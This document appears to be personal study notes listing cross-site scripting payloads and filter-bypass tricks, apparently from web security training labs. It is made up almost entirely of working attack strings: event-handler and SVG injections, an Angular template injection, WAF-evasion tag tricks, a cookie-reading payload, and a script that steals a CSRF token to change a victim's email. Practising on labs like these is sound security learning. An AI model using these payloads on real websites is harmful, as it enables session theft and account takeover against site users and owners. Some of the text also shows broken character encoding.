Unique scripts which used to bypass specify situations
onmouseover="alert('xss')
"><svg onload="alert('xss')">
<img src=# onerror='alert(1)'>
javascript:alert('xss')
'-alert(document.domain)-'
';alert(document.domain)//
<svg><animatetransform onbegin=alert(1) attributeName=transform>DOM XSS with Angular expression
{{constructor.constructor('alert(1)')()}}Arithmetic operator with JSΒ β> Cause Reflected DOM XSS
\"-alert(1)}//Stored DOM XSS bypass the encode bracket
<><img src=1 onerror=alert(1)>Script for executing CSRF Form for XSS by using token CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>Tip for causing XSS with block by WAF (web applications firewall)
- Brute force to find the tag can available
- Try to execute attribute with tag available
- And force the website do the eventΒ β> Execute the XSS. For example
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>Use own tag
Info
If on situation the server block all of tag can inject into the codeΒ β> we need to create them own likeΒ
<xss>
<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#xPayload can help you filter xss via press event by key button to causing the reflect
%27accesskey=%27x%27onclick=%27alert(1)Add \ splash for bypass filter
Info
If some case study like they add black splashΒ
/Β after you input that with quote so with causing reflect xss using close tag for</script>Β for ignore that situation and after that causing payload
<\script><script>alert(1)<\script>